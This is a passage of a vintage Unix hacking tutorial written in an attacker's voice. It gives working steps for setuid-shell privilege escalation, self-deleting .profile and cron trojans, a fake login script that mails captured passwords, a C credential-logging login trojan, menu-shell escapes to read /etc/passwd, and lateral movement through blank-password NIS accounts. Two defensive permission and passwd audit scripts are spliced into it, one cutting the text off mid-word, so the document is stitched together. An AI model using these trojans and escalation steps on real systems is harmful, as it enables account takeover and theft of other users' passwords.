unix- a hacking tutorial.sir

$ id
uid=104(shk) gid=50(user)
$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID.  UID-shells only set the effective user id, not the real user-id.  But, the effective user id over-rides the real user id.  Now, you can, if you wanted to just be annoying, make the utilities suid to root.  What do I mean?  For instance, make 'ls' a root 'shell':

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
........etc crap

Ls would then be able to pry into ANY directory.  If you did the same to "cat" you could view any file.  If you did it to rm, you could delete any file.  If you did it to 'ed', you could edit any file (nifty!), anywhere on the system (usually).

How do I get root?
------------------

   Good question indeed.  To make a program set the user-id shell to root, you have to be root, unless you're lucky.  What do I mean?  Well, say you find a program that sets the user-id to root.  If you have access to write to that file, guess what?  You can copy over it, but keep the uid bit set.  So, say you see that the program chsh is setting the user id to root.  You can copy /bin/sh over it.

$ ls -l
rwsrwsrws  root     other  10999 Jan 4  chsh
$ cp /bin/sh chsh
$ chsh
#

See?  That is just one way.  There are others, which I will now talk about.

More on setting the UID
-----------------------

        Now, the generic form for making a program set the User-ID bit is to use this command:

chmod a+s file

Where 'file' is a valid existing file.  Now, only those who own the file can set the user ID bit.  Remember, anything YOU create, YOU own, so if you copy the /bin/sh, the one you are logged in as owns it, or IF the UID is set to something else, the New UID owns the file.  This brings me to BAD file permissions.

II. HACKING : Bad Directory Permissions

        Now, what do I mean for bad directory permissions?  Well, look for files that YOU can write to, and above all, DIRECTORIES you can write to.  If you have write permissions on a file, you can modify it.
Now, this comes in handy when wanting to steal someone's access.  If you can write to a user's .profile, you are in business.  You can have that user's .profile create a suid shell for you to run when you next logon after the user.  If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

  Now, when the user next logs on, the .profile will create .runme which will set your ID to the user whose .profile you changed.  Ideally, you'll go back in and zap those lines after the suid is created, and you'll create a suid somewhere else, and delete the one in his dir.  The .runme will not appear in the user's REGULAR directory list, it will only show up if he does "ls -a" (or ls with a -a combination), because the '.' makes a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused methods of gaining more power on a unix.  The above could be done in C via the system() command, or by just plain using open(), chmod(), and the like.

* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *

   The BEST thing that could happen is to find a user's directory writeable by you.  Why?  Well, you could replace all the files in the directory with your own devious scripts, or C trojans.  Even if a file is not writeable by you, you can still overwrite it by deleting it.  If you can read various files, such as the user's .profile, you can make a self deleting trojan as so:

 $ cp .profile temp.pro
 $ ed .profile
 1234
 ? a
 cp /bin/sh .runme
 chmod a+x .runme
 chmod a+s .runme
 mv temp.pro .profile
 (control-d)
 ? w
 [another number]
 ? q
 $ chown that_user temp.pro

  What happens is that you make a copy of the .profile before you change it.  Then, you change the original.
When he runs it, the steps are made, then the original version is placed over the current, so if the idiot looks in his .profile, he won't see anything out of the ordinary, except that he could notice in a long listing that the change date is very recent, but most users are not paranoid enough to do extensive checks on their files, except sysadm files (such as passwd).

  Now, remember, even though you can write to a dir, you may not be able to write to a file without deleting it.  If you do not have write perms for that file, you'll have to delete it and write something in its place (put a file with the same name there).  The most important thing to remember if you have to delete a .profile is to CHANGE the OWNER back after you construct a new one (hehe) for that user.  He could easily notice that his .profile was changed and he'll know who did it.  YES, you can change the owner to someone else besides yourself and the original owner (as to throw him off), but this is not wise as keeping access usually relies on the fact that they don't know you are around.

  You can easily change cron files if you can write to them.  I'm not going to go into detail about cronfile formats here, just find the crontab files and modify them to create a shell somewhere as root every once in a while, and set the user-id.

III. Trojan Horses on Detached terminals.

        Basically this:  You can send garbage to a user's screen and mess him up bad enough to force a logoff, creating a detached account.  Then you can execute a trojan horse off that terminal in place of login or something, so the next one who calls can hit the trojan horse.  This USUALLY takes the form of a fake login that writes the username/pw entered to disk.

        Now, there are other trojan horses available for you to write.  Now, don't go thinking about a virus, for they don't work unless ROOT runs them.
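The suid-shell copies in section I and the writable .profile, writable home directory and writable crontab conditions in section II all come down to file modes that an administrator can enumerate. The script below is an added example and is not part of the tutorial: it builds a constructed sample tree of home directories under mktemp (the user names alice, bob and carol, the file names and the modes are all made up for the demonstration) and runs a POSIX find audit over it for group- or other-writable dot-files and directories and for setuid/setgid files. Point the same functions at /home, /var/spool/cron or / to audit a real system.

```shell
#!/bin/sh
# Added example, not part of the tutorial: an administrator's audit for the
# conditions the preceding sections depend on. It builds a throwaway tree of
# constructed home directories under mktemp, then reports
#   1. dot-files (.profile, .cshrc ...) writable by group or other,
#   2. directories writable by group or other (a user's home, a cron dir),
#   3. setuid/setgid files (a hidden ".runme" copy of a shell).
# Only octal -perm tests are used so it runs under POSIX find.

# Build the constructed sample tree below "$1".
make_sample_tree() {
    base="$1"
    mkdir -p "$base/alice" "$base/bob" "$base/carol"
    # alice: sane permissions, nothing to report
    printf 'PATH=/bin:/usr/bin\n' > "$base/alice/.profile"
    chmod 644 "$base/alice/.profile"
    chmod 755 "$base/alice"
    # bob: world-writable .profile, the precondition for the trojan above
    printf 'PATH=/bin:/usr/bin\n' > "$base/bob/.profile"
    chmod 666 "$base/bob/.profile"
    chmod 755 "$base/bob"
    # carol: world-writable home directory plus a hidden setuid ".runme"
    # (a stub script stands in for the copied /bin/sh; the mode is what matters)
    printf 'PATH=/bin:/usr/bin\n' > "$base/carol/.profile"
    chmod 644 "$base/carol/.profile"
    printf '#!/bin/sh\n' > "$base/carol/.runme"
    chmod 4755 "$base/carol/.runme"
    chmod 777 "$base/carol"
}

# Dot-files below "$1" that are writable by group (020) or other (002).
find_writable_dotfiles() {
    find "$1" -type f -name '.*' \( -perm -002 -o -perm -020 \) | sort
}

# Directories below "$1" writable by group or other; sticky /tmp-style
# directories (1000) are expected to be writable and are left out.
find_writable_dirs() {
    find "$1" -type d \( -perm -002 -o -perm -020 \) ! -perm -1000 | sort
}

# Files below "$1" with the setuid (4000) or setgid (2000) bit set.
find_suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) | sort
}

# Total number of findings, printed as a bare integer.
count_findings() {
    {
        find_writable_dotfiles "$1"
        find_writable_dirs "$1"
        find_suid_files "$1"
    } | wc -l | tr -d ' '
}

# Human-readable report, one line per finding.
report() {
    find_writable_dotfiles "$1" | sed 's/^/WRITABLE DOTFILE: /'
    find_writable_dirs "$1"     | sed 's/^/WRITABLE DIR:     /'
    find_suid_files "$1"        | sed 's/^/SETUID\/SETGID:   /'
    echo "findings: $(count_findings "$1")"
}

# Stand-alone demonstration on the constructed tree.
demo_root=$(mktemp -d)
make_sample_tree "$demo_root"
report "$demo_root"
rm -rf "$demo_root"
```

On the constructed tree the report lists bob's .profile, carol's home directory and carol's .runme, three findings in all. A setuid bit on a file inside a home directory is almost never legitimate, and a dot-file another user can write to is exactly the foothold the section above describes, so both are worth a periodic cron-driven run of this check.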
Anyway, a common trojan would be a shell script to get the password, and mail it to you.  Now, you can replace the code for the self deleting trojan with one saying something like:

        echo "login: \c"
        read lgin
        echo off                  (works on some systems)
        (if above not available...: stty -noecho)
        echo "Password:\c"
        read pw
        echo on
        echo "Login: $lgin - Pword: $pw" | mail you

        Now, the best way to use this is to put it in a separate script file so it can be deleted as part of the self deleting trojan.  A quick modification, removing the "login: " and leaving the password may have it look like SU, so you can get the root password.  But make sure the program deletes itself.  Here is a sample trojan login in C:

        #include <stdio.h>
        #include <stdlib.h>       /* exit() */
        #include <unistd.h>       /* getpass() */
        /* Get the necessary defs.. */
        int main(void)
        {
          char name[80];          /* the original declared char *name[80], an array of
                                     pointers, which cannot hold the login string */
          char *pw;               /* getpass() returns a pointer to its own buffer */
          FILE *strm;

          printf("login: ");
          gets(name);
          pw = getpass("Password:");
          strm = fopen("/WhereEver/Whateverfile","a");
          fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
          fclose(strm);
          /* put some kind of error below... or something... */
          printf("Bus Error - Core Dumped\n");
          exit(1);
        }

        The program gets the login, and the password, and appends it to a file (/wherever/whateverfile), and creates the file if it can, and if it's not there.  That is just an example.  Network Annoyances come later.

IV.  Odd systems

        There may be systems you can log in to with no problem, and find some slack menu, database, or word processor as your shell, with no way to the command interpreter (sh, ksh, etc..).  Don't give up here.  Some systems will let you login as root, but give you a menu which will allow you to add an account.
However, ones that do this usually have some purchased software package running, and the people who made the software KNOW that the people who bought it are idiots, and the thing will sometimes only allow you to add accounts with user-id 100 or greater, with their special menushell as a shell.  You probably won't get to pick the shell, the program will probably stick one on the user you created which is very limiting.  HOWEVER, sometimes you can edit accounts, and it will list accounts you can edit on the screen.  HOWEVER, these programs usually only list those with UIDS > 100 so you don't edit the good accounts; however, they do not stop you from editing an account with a UID < 100.  The "editing" usually only involves changing the password on the account.  If an account has a * for a password, the standard passwd program which changes passwords will say no pw exists, and will ask you to enter one. (wallah!  You have just freed an account for yourself.  Usually bin and sys have a * for a password).  If one exists you'll have to enter the old Password (I hope you know it!) for that account.  Then, you are in the same boat as before. (BTW -- These weird systems are usually Xenix/386, Xenix/286, or Altos/286)

        With word processors, usually you can select the load command, and when the word processor prompts for a file, you can select the passwd file, to look for open accounts, or at least valid ones to hack.  An example would be the informix system.  You can get a word processor with that such as Samna word, or something, and those Lamers will not protect against shit like that.  Why?  The Passwd file HAS to be readable by all for the most part, so each program can "stat" you.  However, word processors could be made to restrict editing to a directory, or set of directories.
Here is an example:

        $ id
        uid=100(sirhack) gid=100(users)
        $ sword
        (word processor comes up)
        (select LOAD A FILE)
        <Edit File>: /etc/passwd
        <Loading..>
        (you see: )
        root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
        sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
        datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
        ...

Now I have found an account to take over! "datawiz" will get me in with no trouble, then I can change his password, which he will not like at all.  Some systems leave "sysadm" unpassworded (stupid!), and now, most versions of Unix, be it Xenix, Unix, BSD, or whatnot, ship a sysadm shell which will menu drive all the important shit, even creating users, but you must have ansi or something.

        You can usually tell when you'll get a menu.  Sometimes on UNIX SYSTEM V, when it says TERM = (termtype), and is waiting for you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files

        Not much to say about this.  All it is, is when every password field in the password file has an "x" or just a single character.  What that does is screw you, because you cannot read the shadowed password file, only root can, and it contains all the passwords, so you will not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from writing assembly code that modifies the PCB through self-changing code which the interrupt handler doesn't catch, and things like that.  However, I do not want to give away everything, and this was not meant for advanced Unix Hackers, or at least not the ones that are familiar with 68xxx, 80386 Unix assembly language or anything.  Now I will Talk about Internet.

--->>> InterNet <<<---

        Why do I want to talk about InterNet?
Well, because it is a prime example of a TCP/IP network, better known as a WAN (Wide-Area-Network).  Now, mainly you will find BSD systems off of the Internet, or SunOS, for they are the most common.  They may not be when System V, Rel 4.0, Version 2.0 comes out.  Anyway, these BSDs/SunOSs like to make it easy to jump from one computer to another once you are logged in.  What happens is EACH system has a "yellow page password file", better known as yppasswd.  If you look in there, and see blank passwords you can use rsh, rlogin, etc.. to slip into that system.  One system in particular I came across had a yppasswd file where *300* users had blank passwords in the Yellow Pages.  Once I got in on the "test" account, ALL I had to do was select who I wanted to be, and do: rlogin -l user (sometimes -n).  Then it would log me onto the system I was already on, through TCP/IP.  However, when you do this, remember that the yppasswd only pertains to the system you are on at the time.  To find accounts, you could find the yppasswd file and do:

% cat yppasswd | grep ::

Or, if you can't find yppasswd..

% ypcat passwd | grep ::

On ONE system (which will remain confidential), I found the DAEMON account left open in the yppasswd file.  Not bad.  Anyway, through one system on the internet, you can reach many.  Just use rsh, or rlogin, and look in the file: /etc/hosts for valid sites which you can reach.  If you get on to a system, and rlogin to somewhere else, and it asks for a password, that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
   computer as well.  Try to use the same password (if any) you found the
   hacked account to have.  If it is a default, then it is definitely on the
   other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
   was like typing in your login at a "login: " prompt.  You may not exist on
   the other machine.  Try "rlogin -l login_name", or rlogin -n name..
   sometimes, you can execute "rwho" on another machine, and get a valid
   account.

Some notes on Internet servers.  There are "GATEWAYS" that you can get into that will allow access to MANY internet sites.  They are mostly run off a modified GL/1 or GS/1.  No big deal.  They have help files.  However, you can get a "privileged" access on them, which will give you CONTROL of the gateway.. You can shu
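The "grep ::" check in the InterNet section above and the shadowed-password note in section V both amount to reading the second field of a passwd-format file. What follows is an added example, not the tutorial's own code, written as an administrator's audit of a passwd(5) file or an "ypcat passwd" dump. It goes a little beyond the text: awk splits on ':' so an empty GECOS field (which also produces "::") is not mistaken for an empty password, the same pass lists extra UID-0 entries, and it shows which hashes are still exposed in the world-readable file. The SAMPLE_PASSWD lines are constructed for the demonstration and are not a real password file.

```shell
#!/bin/sh
# Added example, not part of the tutorial: a more careful version of the
# "grep ::" check, written for an administrator auditing a passwd(5) or
# NIS "ypcat passwd" dump. Fields: login:password:uid:gid:gecos:home:shell.

# Constructed sample in passwd(5) format (not a real password file).
# "bin" has an empty GECOS field, which a plain "grep ::" would flag
# as an empty password even though its password field is "*".
SAMPLE_PASSWD='root:x:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
bin:*:2:2::/bin:/bin/sh
toor:x:0:0:Second root:/:/bin/sh
guest::102:100:Guest:/tmp:/bin/sh'

# Logins whose password field (field 2) is empty: no password is asked for.
empty_password_accounts() {
    printf '%s\n' "$1" | awk -F: '$2 == "" { print $1 }'
}

# Logins with UID 0 other than root: every one of them is a root account.
extra_uid0_accounts() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# One line per account: login and how its password field is stored.
#   EMPTY           no password at all
#   SHADOWED        "x", the hash lives in the root-only shadow file
#   LOCKED          "*", no hash can ever match, account cannot log in
#   HASH-IN-PASSWD  the hash itself is in the world-readable file
classify_password_fields() {
    printf '%s\n' "$1" | awk -F: '{
        if ($2 == "")       kind = "EMPTY";
        else if ($2 == "x") kind = "SHADOWED";
        else if ($2 == "*") kind = "LOCKED";
        else                kind = "HASH-IN-PASSWD";
        printf "%-10s %s\n", $1, kind
    }'
}

# Number of accounts whose hash sits in the world-readable file.
visible_hash_count() {
    classify_password_fields "$1" | grep -c 'HASH-IN-PASSWD'
}

# Stand-alone demonstration on the constructed sample.
echo "accounts with empty passwords:"
empty_password_accounts "$SAMPLE_PASSWD"
echo "extra UID-0 accounts:"
extra_uid0_accounts "$SAMPLE_PASSWD"
echo "password field storage:"
classify_password_fields "$SAMPLE_PASSWD"
echo "hashes visible in passwd: $(visible_hash_count "$SAMPLE_PASSWD")"
```

On the sample the audit reports datawiz and guest as passwordless, toor as a second UID-0 account, and one hash (sirhack's) still exposed in the file; bin is correctly left alone despite its "::". Run the same functions over "ypcat passwd" output to audit an NIS map rather than a single host's file.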